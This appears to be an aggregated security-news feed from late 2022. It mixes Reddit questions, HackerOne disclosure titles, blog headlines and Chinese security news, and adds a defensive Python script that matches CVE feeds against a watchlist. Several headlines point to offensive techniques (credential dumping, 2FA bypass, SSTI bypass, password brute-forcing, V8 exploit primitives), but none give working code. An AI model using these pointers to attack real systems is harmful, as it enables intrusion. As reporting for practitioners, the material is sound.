    Which Government/Country has the best Network Security/ Information security?
    In this question I'm not talking about oh so and so government has this incredible encryption that required five peoples eyebrow hair to unlock type thing. I am more talking about the day to day stuff that doesn't make headlines but is just quietly acknowledged as actually quite good. For a practical example the UK has a lot of fancy sounding achievements for their cybersecurity and likes to boast about how seriously they take it... but then in practice ministers are using WhatsApp to talk about important information and the NHS as well as other government sectors have regularly been crippled by cyber attacks. What government do you think actually takes their Network Security seriously and actually implements it effectively? Or if you can't think of one then just one where you've heard what its like and think "Oh that's actually quite good" submitted by /u/DeerInTheHerbGarden [link] [comments]
    Is there a way to find out where a gps tracker sends data to?
    A friend of mine recently found a GPS tracker in his car. Is there a way to find out where it's sending the data? It has a SIM card in it, so I assume it's sending the location via mobile internet. submitted by /u/kappadoky [link] [comments]
    What are some modern web security books?
    The two best books I am aware of for web security are the "The Tangled Web" and "The Web Application Hackers Handbook" and while these are both fantastic books, they were both released in 2011, and while the majority of the content still applies, there have been many changes to both server and browser security mechanisms over the last decade which are not present. Do you know of any other great modern web security books I can add to my collection? Thanks! submitted by /u/pentesticals [link] [comments]
    Creating an automated vulnerability alerting system from different sources.
    Hello, I want to find a way to automate alerting for newly found vulnerabilities. We have scanners that will scan, but I want to implement another solution that will notify us every week from different sources like mitre, nvd, opencve, cisa.gov, etc. searching with keywords for example: Ubuntu, windows 10, java, or some frameworks and libraries and their version. How are big companies doing it or can you recommend how to approach the project? I'm confused, should I write a script or something or just use PowerAutomate with an dedicated email account. Is there any preferred method or tools to do it with. How should I download the resources - RSS feed, API calls, XML-s, JSON? Thanks! ​ Edit: Fixed flair. submitted by /u/tryingtoworkatm [link] [comments]
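    A minimal version of the pipeline the post above asks about, as an added example (not code from the poster or from any of the named services): normalize records from two feeds into one shape, match them against a keyword watchlist, merge the same CVE seen in several feeds into one alert, and render the result as e-mail body text. It goes slightly beyond the question by handling two feed layouts at once. The field names are assumptions about two real feeds, namely the CISA KEV catalog JSON (a `vulnerabilities` list with `cveID`, `vendorProject`, `product`, `vulnerabilityName`, `shortDescription`, `dateAdded`) and NVD API 2.0 responses (`vulnerabilities` entries carrying `cve.id`, `cve.published`, `cve.descriptions[].value`); fetching is left to the caller (`json.load` on a downloaded file), and the records below are constructed placeholders with fake CVE IDs, not real advisories.

```python
"""Keyword alerting over vulnerability feeds.

Added example, not from the original thread. Feed field names are
assumptions about CISA KEV and NVD 2.0; sample records are constructed.
"""
import re
from dataclasses import dataclass
from datetime import date

@dataclass(frozen=True)
class Finding:
    cve_id: str
    source: str
    published: date
    summary: str

def normalize_kev(doc):
    """Flatten CISA KEV records into Finding objects."""
    out = []
    for v in doc.get("vulnerabilities", []):
        text = " ".join(str(v.get(k, "")) for k in
                        ("vendorProject", "product", "vulnerabilityName", "shortDescription"))
        out.append(Finding(v["cveID"], "cisa-kev", date.fromisoformat(v["dateAdded"]), text))
    return out

def normalize_nvd(doc):
    """Flatten NVD 2.0 records into Finding objects (English description only)."""
    out = []
    for item in doc.get("vulnerabilities", []):
        cve = item["cve"]
        desc = next((d["value"] for d in cve.get("descriptions", []) if d.get("lang") == "en"), "")
        out.append(Finding(cve["id"], "nvd", date.fromisoformat(cve["published"][:10]), desc))
    return out

def match_watchlist(findings, terms, since=None):
    """Return {cve_id: {"sources": set, "terms": set}} for findings published on
    or after `since` whose text contains a watchlist term as a whole word.
    The same CVE seen in several feeds is merged into one alert."""
    patterns = {t: re.compile(r"\b" + re.escape(t) + r"\b", re.IGNORECASE) for t in terms}
    hits = {}
    for f in findings:
        if since is not None and f.published < since:
            continue
        matched = {t for t, p in patterns.items() if p.search(f.summary)}
        if matched:
            entry = hits.setdefault(f.cve_id, {"sources": set(), "terms": set()})
            entry["sources"].add(f.source)
            entry["terms"].update(matched)
    return hits

def weekly_alerts(kev_doc, nvd_doc, terms, since_iso=None):
    """Convenience wrapper: both feeds, one watchlist, optional ISO cut-off date."""
    since = date.fromisoformat(since_iso) if since_iso else None
    return match_watchlist(normalize_kev(kev_doc) + normalize_nvd(nvd_doc), terms, since)

def render_report(hits):
    """One line per alert, suitable for the body of a weekly e-mail."""
    return "\n".join(
        f"{cve}: matched {', '.join(sorted(h['terms']))} (seen in {', '.join(sorted(h['sources']))})"
        for cve, h in sorted(hits.items()))

# Constructed sample documents (fake CVE IDs, not real records).
KEV_SAMPLE = {"vulnerabilities": [
    {"cveID": "CVE-2099-0001", "vendorProject": "Microsoft", "product": "Windows 10",
     "vulnerabilityName": "Windows 10 Kernel Privilege Escalation",
     "shortDescription": "A kernel driver allows local privilege escalation.",
     "dateAdded": "2022-11-03"},
    {"cveID": "CVE-2099-0003", "vendorProject": "Example Corp", "product": "Widget",
     "vulnerabilityName": "Widget Remote Code Execution",
     "shortDescription": "Unauthenticated RCE in the Widget admin API.",
     "dateAdded": "2022-11-02"},
]}
NVD_SAMPLE = {"vulnerabilities": [
    {"cve": {"id": "CVE-2099-0001", "published": "2022-11-02T10:00:00.000",
             "descriptions": [{"lang": "en", "value": "A flaw in Windows 10 allows privilege escalation."}]}},
    {"cve": {"id": "CVE-2099-0002", "published": "2022-11-04T08:30:00.000",
             "descriptions": [{"lang": "en", "value": "OpenSSL buffer overflow in certificate parsing."}]}},
    {"cve": {"id": "CVE-2099-0004", "published": "2022-09-01T00:00:00.000",
             "descriptions": [{"lang": "en", "value": "Ubuntu kernel module out-of-bounds read."}]}},
]}
WATCHLIST = ["windows 10", "openssl", "ubuntu"]

if __name__ == "__main__":
    print(render_report(weekly_alerts(KEV_SAMPLE, NVD_SAMPLE, WATCHLIST, "2022-11-01")))
```

    Whole-word matching keeps "java" from firing on "javascript", but version-aware matching (a library name plus the version range you actually run) is the next step and needs CPE or package-manager data rather than free text; the normalization layer is where that data would be attached.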
    is there a way to find who's spamming website contactme??
    Recently a friend has been getting disgusting messages through the contact me page on her website. Personal attacks, wishing death upon children, telling her to kill herself. All kinds of stuff. After going to the police and it still continuing is there a way to somehow find out who's doing it when they keep making new fake email addresses?? Any advice would be greatly appreciated as she is getting pretty shaken up about it submitted by /u/handsupcacto [link] [comments]
  • Open

    CSS Injection via Client Side Path Traversal + Open Redirect leads to personal data exfiltration on Acronis Cloud
    Acronis disclosed a bug submitted by mr-medi: https://hackerone.com/reports/1245165 - Bounty: $250
    DOS via issue preview
    GitLab disclosed a bug submitted by legit-security: https://hackerone.com/reports/1543718 - Bounty: $7640
    Path paths and file disclosure vulnerabilities at influxdb.quality.gitlab.net
    GitLab disclosed a bug submitted by otoyyy: https://hackerone.com/reports/1643962 - Bounty: $100
    DOS via move_issue
    GitLab disclosed a bug submitted by legit-security: https://hackerone.com/reports/1543584 - Bounty: $2300
    RepositoryPipeline allows importing of local git repos
    GitLab disclosed a bug submitted by vakzz: https://hackerone.com/reports/1685822 - Bounty: $22300
  • Open

    WGET doesn't work on Windows 11
    Hi, I hope this post is allowed but this certainly seems like the right community to ask. I just built a new computer running Windows 11 and now it appears that WGET fails. I get a "Wget is not recognized as an internal or external command." Is there a workaround to this? submitted by /u/Notorious888 [link] [comments]
  • Open

    HTML INJECTION LEADS TO OPEN REDIRECT
    Hiii, hacker scriptkiddie is back! So a few days ago, I was hunting on a VPN program. Let's consider xyz.com, where I found HTML injection… Continue reading on Medium »
    Credentials Dumping :Red Teaming
    When an attacker has an access to the target system then there are multiple methods to retrieve the credentials stored in that target. So… Continue reading on Medium »
    CSRF Leads to Delete User Account
    Hey there, this is my first write-up so don’t expect it to be “professional” or something like this :”D Continue reading on Medium »
    Web Enumeration -WPScan
    WPScan which is also an automated tool for web enumeration… Continue reading on Medium »
    The Ultimate Bug Bounty Checklist For 2FA
    TL;DR- A 13 point checklist of possible bugs to run through in hacking 2FA or MFA on websites, and how to exploit them. Continue reading on The Gray Area »
    BUG BOUNTY: FIND HIDDEN PARAMETERS
    Hey everyone! I hope you all are doing good and hunting bugs. In this article, we are going to learn how to find hidden parameters in web… Continue reading on Medium »
    Cyber Laws In Pakistan!
    Hey, guys! Continue reading on Medium »
    Team Finance Exploited for $14.5M, Attacker Keeps 10% as a Bug Bounty.
    On October 27th, DeFi project Team Finance announced that they had just been alerted about an exploit on its protocol. They said they were… Continue reading on OMNIA Protocol »
  • Open

    SecWiki News 2022-11-04 Review
    Building a WireGuard tunnel over China Telecom's TR069 internal network for cross-site networking by ourren; Prowler: AWS security best-practices baseline checks by ourren; For more of the latest articles, visit SecWiki
  • Open

    Python Source Code Analysis
    No content preview
    Automation of Buffer-Overflow
    No content preview
    4 Videos From 4 Infosec Experts to Explain Web3 Hacking
    No content preview
  • Open

    The Android Malware's Journey: From Google Play to banking fraud | Cleafy Labs
    submitted by /u/f3d_0x0 [link] [comments]
    Reverse Branch Target Buffer Poisoning - new ASLR bypass technique using CPU vulnerabilities [PDF]
    submitted by /u/Gallus [link] [comments]
    MI-X - Determine whether your compute is truly vulnerable to a specific vulnerability
    submitted by /u/boutnaru [link] [comments]
    CVE-2022-33679 Windows Kerberos Elevation of Privilege
    submitted by /u/smokiesmk [link] [comments]
  • Open

    ATT&CK: Caldera hands-on (step-by-step tutorial)
    Reproduced the Windows worm #1 chain with Caldera; records the installation process and the pitfalls encountered.
    FreeBuf Weekly | US Army fields cyber situational understanding software for the first time; information on 23 million Taiwan residents leaked
    Happy weekend, Buffers. Here is this week's FreeBuf Weekly, summarizing the hot news, security incidents, good reads and handy tools of the week, so you won't miss a single highlight!
    German multinational automotive giant Continental attacked by the LockBit ransomware group
    LockBit demanded that the ransom be received by 15:45:36 on November 4 (23:45:36 Beijing time).
    The open-source code you import may carry vulnerabilities
    A look ahead at software supply-chain vulnerability analysis techniques.
    Dozens of financial organizations in Africa attacked by hackers, with heavy losses
    In recent years the OPA1ER group has launched more than 30 successful cyberattacks against banks, financial-services and telecom companies in Africa, Asia and Latin America.
    Ministry of Culture and Tourism issues new rules: hotels strictly prohibited from big-data price discrimination against regular customers and from unlawfully collecting information
    As the number of platform users keeps growing, the convenience brought to travelers has come with many emerging problems, the best known being big-data price discrimination against regular customers ("killing the familiar").
  • Open

    Immunity Debugger crash on M1 Mac
    Hello everyone. I am using a macbook pro 16 with m1 pro and have set up a VM via UTM to emulate Windows XP and Windows 7. These x86 and x64 machines work quite well and I need them to study Windows exploit development. For this reason I have installed within these machines Immunity Debugger, but when I try to debug an application (such as Vulnserver), the Debugger crashes the VM. Do you have any suggestions, has anyone experienced the same thing? submitted by /u/onikage04 [link] [comments]
  • Open

    From Fuzzing to Proof: Using Kani with the Bolero Property-Testing Framework
    Article URL: https://model-checking.github.io//kani-verifier-blog/2022/10/27/using-kani-with-the-bolero-property-testing-framework.html Comments URL: https://news.ycombinator.com/item?id=33463600 Points: 1 # Comments: 0
  • Open

    Notes on developing eBPF programs on Android (part 1)
    Author: Hcamael@Knownsec 404 Lab. Date: November 4, 2022. I have been studying eBPF recently and am keeping study notes. Background: I actually wanted to learn how ecapture is implemented, but when testing on my Xiaomi 10 (already rooted) I found it could not run, because ecapture requires the kernel to be built with CONFIG_DEBUG_INFO_BTF; whether this option is enabled can be checked in /proc/config.gz...
  • Open

    Some bypasses for Python SSTI
    A collection of Python SSTI bypass techniques.
    Commonly abused permissions in domain penetration and their application scenarios
    This article discusses several permissions that are easily abused in Active Directory domains and the scenarios in which they apply, with practical demonstrations.
    How to protect an enterprise's core code | FreeBuf customer-side group discussion
    Data security has become a hot topic in the industry, yet protection of code, especially core code, seems rarely discussed. Has the sensitivity and importance of code fallen below that of data? How should core code be kept secure?
    FreeBuf Morning Report | US Army fields cyber situational understanding software for the first time; hackers break into Ukrainian military battlefield command system
    According to a report, US financial institutions reported 1,489 ransomware incidents in 2021, far more than the 487 in 2020.
    A detailed real-world penetration test
    An authorized penetration test, documented in detail. It was full of coincidences and fairly interesting, so here is a record of it. Overall the difficulty was not high and there was no domain; the hard part was AV evasion. Getting the reporting system was a coincidence, getting a callback through port forwarding went without surprises, and the internal network seemed fairly large.
    JNDI injection in Fastjson 1.2.23 via the JdbcRowSetImpl chain
    Fastjson is a high-performance, full-featured JSON library written in Java. It uses an "assume ordered, fast match" algorithm that pushes JSON parsing performance to the limit, making it the fastest JSON library in Java today.
    VR, flash mobs, brain-teaser challenges, camping... the CIS 2022 Cybersecurity Innovation Conference announces its activities!
    Besides the wealth of solid content it is known for, novel interactive activities are a hallmark of the CIS conference.
    Police open an investigation: a female teacher in Henan may have died from "online-class bombing"; the online abuse must stop
    Under the continuing impact of COVID-19, online classes and online meetings have become the new way to study and work. No one expected that a teacher would lose her life to so-called "online-class bombing"; it is heartbreaking.
    Forget the money! 32% of CISOs are considering leaving
    32% of CISOs or other IT security decision makers in the UK and US are considering resigning.
    A different route to CVEs | AOSP Bug Hunting with appshark (1): Intent Redirection
    The two CVEs found by the scanner
    Hundreds of US news websites are pushing malware
    The SocGholish JavaScript malware framework was deployed on the websites of hundreds of newspapers across the US.
    Symbol relocation in static linking | GCC | PWN basics
    A static linker takes a set of relocatable object files and command-line arguments as input and produces a fully linked executable object file that can be loaded and run.
    vulntarge-h
    Preface: part of the hackmyvm target-practice series. This article is for technical discussion and learning only; do not use it for illegal purposes, for which the author bears no responsibility. All environments are lab machines downloaded online and studied on my own machine. Points covered: this box is very interesting, combining tunneling, AV evasion and other knowledge.
    Introduction and practice of IoT endpoint security: playing with IoT firmware (part 2), the DIY edition
    This part focuses on common DIY methods for endpoint-device firmware, and finally leads the reader into the world of firmware DIY by modifying the firmware of an ASUS AC68U router.
  • Open

    Release Ghidra 10.2 · NationalSecurityAgency/ghidra
    submitted by /u/mumbel [link] [comments]
    Why Did the OpenSSL Punycode Vulnerability Happen
    submitted by /u/ScottContini [link] [comments]
    Threat Model Examples
    submitted by /u/hipver [link] [comments]
    The below-OS for supply chain of critical infrastructure protection
    submitted by /u/hardenedvault [link] [comments]
    CVE-2022-3602 & CVE-2022-3786 - OSS tools to detect susceptibility to the recent OpenSSL issues
    submitted by /u/SRMish3 [link] [comments]
  • Open

    Google Dorking — Everything You Need To Know
    You say you want to be a hacker but you still use Google like you are 100 years old. Let us fix that! Continue reading on Medium »
    Data Visualization and Analysis for Cybercrime Investigation
    Table of Contents Continue reading on Medium »
    Introducing the Open Source Analysis Tree (OSAT)
    The Open Source Analysis Tree (OSAT) is a simple flowchart which has been designed to be utilised as part of the collection stage of the… Continue reading on Medium »
  • Open

    what's the main tool in your shop?
    Does anyone still like (or tolerate) FTK or Encase? My lab uses Axiom Cyber and I convinced them to switch from FTK to Xways starting next year. Curious where everyone else is at or looking to move to. submitted by /u/Inevitable_Logging [link] [comments]
    Collecting iMessages from cloud
    We have been using Magnet Acquire to collect messages that have been backed up to a users icloud account. We then log in to an iPhone as that user and collect that phone. This is used in cases where the user has to maintain usability and “just needs to keep their phone”. Sorry to those who already understand this. This has been a tested & consistently trusted method. However with the most recent update, our testing is showing that even with complete backup there is now data loss. We are only getting about 2gb of messages (one had over 28gb on the phone). Are you guys seeing the same? Do you have a work around and do you understand why this is happening? submitted by /u/Original-Face-9933 [link] [comments]
    Camera solution for evidence
    Hello guys, as we are getting more and more evidence we are searching for a camera solution to take pictures of them. It may be a camera which is fixed on the desk so we don’t have to change the angle. For bigger evidence like All-in-One-Computers we could use our normal camera. It's mainly for smaller evidence like smartphones, flash drives... Any recommendations for that? Network support would also be great so that the taken pictures were uploaded to our storage. Thank you in advance and BR submitted by /u/illegaldolly [link] [comments]
  • Open

    OS Banner Grabbing & Identifying Target System OS.
    Banner grabbing is a technique used by hackers and security teams to gain information about computer systems on networks and services… Continue reading on Medium »
    Invitation Hijacking
    Hi Guys! Long time no see! Continue reading on Medium »
    Login CSRF — What is it and how to prevent it?
    Login CSRF (Login Cross-Site Request Forgery) is a type of attack where an attacker forces a user to login to the attacker’s account. A… Continue reading on Medium »
    How I made a reliable hacking tools and resources search engine in two days (~6500 entries!)
    https://lobuhi.github.io/ Continue reading on Medium »
    Get Blind XSS within 5 Minutes — $100
    Hello Boss…. Continue reading on InfoSec Write-ups »
    TGA Weekly Newsletter [11/2/22] — U.S. State Department Hack
    Hey! Welcome to The Gray Area’s weekly newsletter, with the top posts of the week. Today, I’ll be reviewing top posts and a hack on the… Continue reading on The Gray Area »
  • Open

    Get Blind XSS within 5 Minutes — $100
    No content preview
    OSCP — Cracking The New Pattern
    No content preview
    pentesting.cloud part 1: “Open To The Public” CTF walkthrough
    No content preview
    Write-up: Information disclosure in error messages @ PortSwigger Academy
    No content preview
    Fun with TurboIntruder,
    or, how to get ffuf with a gui while also doing some py coding Continue reading on InfoSec Write-ups »
    The easiest bug to get a Hall of fame from a Billion dollar company.
    No content preview
    The Complete Guide to PortSwigger Directory Traversal and How to Prevent It
    No content preview
    Guess Your Enemies’ Passwords With Python (Brute Force Attack)
    No content preview
  • Open

    Stopping C2 communications in human-operated ransomware through network protection
    submitted by /u/SCI_Rusher [link] [comments]
    Cybersecurity expert analysis about security vulnerabilities that alters exposed NGINX config files
    submitted by /u/cheeztoshobo [link] [comments]
    On Bypassing eBPF Security Monitoring
    submitted by /u/default_user_acct [link] [comments]
  • Open

    Password management system able to share subsets of passwords to different devices
    I use a password manager (Bitwarden), but it has a single master password which gives read-write access to ALL of my passwords at once. At times I need to read a small subset of my passwords on some device which I don't fully trust. Things like: I made a bunch of "media boxes" (Raspberry Pis with the appropriate software) with access to a number of services which require authentication via password (like Netflix, Spotify etc). Besides the one I use, I gave one to my parents, one to my brother, one to my partner and so on. I have access to some computers I don't manage (like the university's) and need to access a number of services from there. I have a couple of gaming devices (a desktop computer and a steam deck) where my nephews often play. They use a number of services with passwor…
    How to collect vendor advisories to MISP
    I have been given a threat intel off task, which is not really my expertise, to collect security advisory pages from vendors such as Cisco and from less popular ones such as startup vendors' security pages. How does one go about this? Do I need to manually write a Python crawler with BeautifulSoup to scrape this data periodically and push it into the MISP API, or is there an official way to go about this? submitted by /u/VertigoRoll [link] [comments]
    Is there any InfoSec job I won’t hate?
    I’m currently a security compliance manager and am feeling burned out after only a matter of months starting the job. The cycle of audits - constantly hounding people for evidence, the pressure to deliver, being blamed for IT’s problems - is a total drag. I make good money and I could possibly retire in 10 years (still in my 30s), but I don’t think I can stand it much longer. I honestly didn’t like it much better when I was a front line PCI auditor, a project security analyst, or a security governance & controls analyst. Is there any info security career path I might not hate? For example is consulting or something like that where I’m not owning so much responsibility better? Or is there a wholly different career path outside of security where my skills might transfer somewhat? I’m honestly considering quitting once my annual bonus pays out and getting a job at a coffee shop or something. submitted by /u/Upbeat-Iron-4250 [link] [comments]
    How to learn to exploit a chrome V8 OOB?
    Hi all, I'm trying to learn how to exploit an out-of-bounds vulnerability which I have leveraged from an overflow in V8. I have reverted to an older version of V8 associated with the commit of a publicly known vulnerability. However, I'm stuck as to how to proceed as I haven't had much luck in finding resources that show how to exploit these OOBs in a step-by-step manner. There seems to be a lot of guesswork involved, as opposed to a structured methodology. I have returned a negative array value (-1) and obtained OOB read. I just don't know how to go about it next; i.e. overwriting the second array length, constructing the `addrof` and `fakeobj` primitives, etc. Are there any easy ways to go about this, i.e. using markers to locate pointers in memory? If you know of any awesome resources which go into depth in showing how this can be done, please do share as I would love to learn more! submitted by /u/hiphopftplad [link] [comments]
  • Open

    SecWiki News 2022-11-03 Review
    Public Cloud Attack and Defense Series: Leakage and Exploitation of Cloud Credentials by ourren; P2P Botnets: Retrospective, Current State, Continuous Monitoring by ourren. For more of the latest articles, visit SecWiki.
  • Open

    Command injection in GitHub Actions ContainerStepHost
    GitHub disclosed a bug submitted by jupenur: https://hackerone.com/reports/1637621 - Bounty: $4000
    Archived / Deleted / Private Poll Can Be Viewed by Another Users [Crowdsignal WordPress plugins]
    Automattic disclosed a bug submitted by apapedulimu: https://hackerone.com/reports/1711318 - Bounty: $100
    CVE-2022-42916: HSTS bypass via IDN
    Internet Bug Bounty disclosed a bug submitted by kurohiro: https://hackerone.com/reports/1753226 - Bounty: $2400
  • Open

    Windows Processes, Nefarious Anomalies, and You: Threads
    In part 1 of this blog mini-series, we looked at memory regions and analyzed them to find some potential malicious behavior. In part 2, we will do the same thing with enumerating threads. Nobody explains it better than Microsoft—here is their explanation of what a thread is: “A thread is the basic unit to which... The post Windows Processes, Nefarious Anomalies, and You: Threads appeared first on TrustedSec.
  • Open

    Catastrophic backtracking: how can a regular expression cause a ReDoS CVE?
    Article URL: https://pvs-studio.com/en/blog/posts/csharp/1007/ Comments URL: https://news.ycombinator.com/item?id=33450419 Points: 2 # Comments: 0
  • Open

    Cobalt Strike Analysis and Tutorial: Identifying Beacon Team Servers in the Wild
    We present new techniques that leverage active probing and network fingerprint technology to help you detect Cobalt Strike’s Team Servers. The post Cobalt Strike Analysis and Tutorial: Identifying Beacon Team Servers in the Wild appeared first on Unit 42.
    Threat Brief: CVE-2022-3786 and CVE-2022-3602: OpenSSL X.509 Buffer Overflows
    OpenSSL released a security advisory describing two high severity vulnerabilities within the OpenSSL library (CVE-2022-3786 and CVE-2022-3602). The post Threat Brief: CVE-2022-3786 and CVE-2022-3602: OpenSSL X.509 Buffer Overflows appeared first on Unit 42.
  • Open

    Creating backdoor on Github account
    Abstract — Importance of regularly auditing Personal Access Tokens, OAuth Apps and added SSH Keys Continue reading on Medium »
  • Open

    404 StarLink Project | AOSP Bug Hunting with appshark (1): Intent Redirection
    Author: ByteDance Wuheng Lab. Original link: https://mp.weixin.qq.com/s/CY2nLUb2VQaBNxAKd7GeUQ. This article is a hands-on walkthrough of Appshark, a 404 StarLink Project, and shares two cases in which Appshark was used to find CVE vulnerabilities. Project address: http://github.com/bytedance/appshark. 404 StarLink Project: https://github.com/...
  • Open

    Much Openness
    Went through my bookmarks and these are still open. Some might be a repost but what can you do. submitted by /u/SeniorAlbatross [link] [comments]

  • Open

    Providing the VM used for evidence acquisition.
    I’m using, as I’ve always done in the past, a VM lab environment to acquire digital forensic evidence about illegally shared content on the web. This time my counterpart in the trial wants my acquired evidence rejected because I’m not providing the VM originally used in the acquisition process. He’s focusing on the missing original container in which the evidence was produced, so none of it is, from a forensic perspective, reliable and valid. This is the first time I’ve heard this, so I really would like to know if it is true and on what basis it could be stated (is there any international framework or ISO standard for this?). Thanks for any help you’d like to offer. submitted by /u/TheHypersonic [link] [comments]
    Does MAGNET have the best "zero to hired" forensic training program?
    Not paid by Magnet, I promise. I do use Axiom/Outrider/DVR Examiner, however. I run an LE forensic lab. I was looking into the best way to get our fresh hires (generally right out of college) with zero experience to the point where they're conducting their own forensic examinations and being court expert-ready in the most cost effective way, before throwing them into more strenuous training (IACIS, etc). I came across Magnet's TAP (Training Annual Passport), which gives you 12 months access to all of their in-person, live online, and self-paced training courses for $6,500. The training surprisingly covers a large majority of the skills we need in our lab: Windows forensics (fundamentals to advanced) macOS forensics iOS examinations Android examinations DVR forensics OSINT inve…
  • Open

    Checkmk: Remote Code Execution by Chaining Multiple Bugs (1/3)
    submitted by /u/monoimpact [link] [comments]
    Gregor Samsa: Exploiting Java's XML Signature Verification
    submitted by /u/jp_bennett [link] [comments]
    urlscan.io's SOAR spot: Chatty security tools leaking private data
    submitted by /u/mckirk_ [link] [comments]
    Symbolic Triage: Making the Best of a Good Situation — Atredis Partners
    submitted by /u/jeandrew [link] [comments]
  • Open

    Three incredible GitHub OSINT tricks
    Continue reading on CodeX »
    Open Source Intelligence and the Metaverse.
    As we very quickly move towards the “Metaverse” and all the virtual realities and virtual world technologies that sound promising and seem… Continue reading on Medium »
    Introducing and Using Maltego
    In this article we try to teach what Maltego is and how ethical hackers use this tool. Continue reading on Medium »
    From image to exact location tracking (GEOMINT)
    What are the exact GPS coordinates of this image? Continue reading on Medium »
  • Open

    CVE-2022-24828: Composer Command Injection Vulnerability
    Article URL: https://blog.packagist.com/cve-2022-24828-composer-command-injection-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=33443466 Points: 1 # Comments: 0
    CVE-2022-31692: Spring Security susceptible to authorization rules bypass
    Article URL: https://nvd.nist.gov/vuln/detail/CVE-2022-31692 Comments URL: https://news.ycombinator.com/item?id=33436686 Points: 3 # Comments: 0
  • Open

    Why did the OpenSSL punycode vulnerability happen?
    Article URL: https://words.filippo.io/dispatches/openssl-punycode/ Comments URL: https://news.ycombinator.com/item?id=33440341 Points: 189 # Comments: 92
    OpenSSL Vulnerability Once Heartbleed-Level “Critical” Now Deemed “High”
    Article URL: https://www.resmo.com/blog/new-openssl-vulnerability Comments URL: https://news.ycombinator.com/item?id=33437184 Points: 2 # Comments: 0
    List of software (un)affected by OpenSSL vulnerability
    Article URL: https://github.com/NCSC-NL/OpenSSL-2022/tree/main/software Comments URL: https://news.ycombinator.com/item?id=33431825 Points: 2 # Comments: 0
  • Open

    Timelapse HackTheBox Walkthrough
    Summary: Timelapse is an HTB Active Directory machine that is rated easy, but as the concept of the initial compromise is unique, I believe The post Timelapse HackTheBox Walkthrough appeared first on Hacking Articles.
  • Open

    I built an ML API for tracking security detections and prioritizing alerts
    In my previous work, I had to deal with lots of security alerts, and most were false positives. For investigation, I used to check with all kinds of threat intelligence (e.g. viruses), which helps verify whether they are malicious. The reality is most of them come back with no direct maliciousness. However, I do not have time to thoroughly investigate everything to prove they are false positives. One thing I've developed lately is an API that keeps track of the statistics of detection types and artifacts: are they new artifacts, the false positive rate of the detection type, the frequency of artifacts (user, machine, registry...), how common these artifacts are, whether anyone has investigated before, etc. I use these metrics to prioritize my investigation queue. If anyone is interested in giving it a spin, please let me know! submitted by /u/CyberRing102 [link] [comments]
    Enterprise security architecture frameworks
    Looking to document an enterprise security architecture. We're not large enough to really use something like SABSA. What are my other options? submitted by /u/Itchy-Criticism-5470 [link] [comments]
    Cyber attack at work, what should I do next?
    Hi all, My workplace got attacked by a relatively known group; they have encrypted all the files and are asking the workplace to buy the decryption tool to get it all back. All servers, emails etc. are down. My question is, are there any precautions I should take now? I have a work laptop, I WFH a lot and use a VPN (and did yesterday) to access the drives with my work data. Does that mean my laptop is infected? Is it safe to use it? I think the workplace found out this morning and I haven’t opened my laptop since because I am cautious. My work files are on the server, but locally on the work laptop I also have private data. On the browsers I am logged in and have logins saved for everything. Is it ok to switch on the laptop? If I connect to my home wifi, is there a risk to my network and other devices? Is my home network already screwed? I also have a private Dropbox linked to the laptop; is that data ok? Are my logins safe? Basically, I am really lost and don’t fully understand how big of a deal it is, and what I should do next. Thanks a lot, any help is appreciated! submitted by /u/Throw-248-Away [link] [comments]
  • Open

    Chaining Multiple Vulnerabilities Leads to Remote Code Execution (RCE).
    Jenkins RCE through groovy script console. Continue reading on Medium »
    The Complete Guide to PortSwigger Directory Traversal and How to Prevent It
    PortSwigger is a company that specializes in vulnerability research and development of security tools. It is a company which has been… Continue reading on InfoSec Write-ups »
    How 403 Forbidden Bypass got me NOKIA Hall Of Fame (HOF)
    Hello, amazing people and bug bounty hunters, This is JD ( Jaydeepsinh Thakor ) I hope you all are fine ❤, In this write-up, I would like… Continue reading on InfoSec Write-ups »
    Bug Bounty / Cybersecurity Resource Management Guide
    thebinarybot Continue reading on Medium »
  • Open

    awesome-malware-development: Organized list of my malware development resources
    submitted by /u/default_user_acct [link] [comments]
  • Open

    SecWiki News 2022-11-02 Review
    A Brief Analysis of NodeJS by 路人甲; Analysis and Reflections on the Cyberattack against Northwestern Polytechnical University by ourren. For more of the latest articles, visit SecWiki.
  • Open

    How 403 Forbidden Bypass got me NOKIA Hall Of Fame (HOF)
    No content preview
    How to Assess Active Directory for Vulnerabilities Using Tenable Nessus’ Active Directory Starter…
    The Nessus vulnerability scanner from Tenable is a widely known tool for conducting vulnerability assessments of networks and devices… Continue reading on InfoSec Write-ups »
  • Open

    About me x {one}
    About me + week 1 Continue reading on Medium »
  • Open

    all the photos of Elvis related things you could ever want.
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    Comprehensive Zero Trust? Dell Makes a “Big Move”
    Dell has been deeply engaged in this field for decades, with extensive experience and a technical foundation built up over many years, providing truly modern solutions for enterprise security.
    FreeBuf Morning Report | Microsoft Servers Used to Amplify DDoS Attacks; How Iran Tracks and Controls Protesters' Phones
    In the first three quarters of this year, the cybersecurity industry saw 151 deals, up from 94 in the same period of 2020.
    Samsung Galaxy Store Hit by Serious Vulnerability; Hackers Can “Secretly” Install Apps on Target Devices
    The vulnerability may trigger remote command execution on affected phones.
    Apply Now | Guosen Securities Co., Ltd. Is Hiring Network Security Engineers
    The position is located at Guosen Financial Building, Fuhua 1st Road, Futian District, Shenzhen, with an annual salary of 300,000-600,000 RMB.
    Greater Emphasis on Intelligence Sharing: White House Convenes Second International Counter-Ransomware Summit
    From October 31 to November 1 local time, the United States, together with 36 other countries, held the second International Counter Ransomware Initiative summit at the White House to study how to better combat ransomware attacks.
    OpenSSL Fixes Two High-Severity Vulnerabilities
    OpenSSL patched two high-severity vulnerabilities in its open-source cryptographic library used to encrypt communication channels and HTTPS connections.
    Roundup | Top Cybersecurity M&A Deals of 2022
    As vendors seek to consolidate their positions and expand their product ranges, the red-hot cybersecurity M&A market has continued into 2022.
  • Open

    Fuzzing Websites to Find Hidden Parameters
    TL;DR- A great how-to guide on finding hidden parameters that could lead to significant exploitation of a website or application. Continue reading on The Gray Area »
    FUZZING FOR HIDDEN PARAMS
    Hello fellow hackers, today I want to show you a method to fuzz hidden params, especially on PHP endpoints. Continue reading on Medium »
  • Open

    Stored XSS in intensedebate.com via the Comments RSS
    Automattic disclosed a bug submitted by bugra: https://hackerone.com/reports/1664914 - Bounty: $150
  • Open

    CVE-2022-33980 Apache Commons Configuration Remote Command Execution Vulnerability Analysis
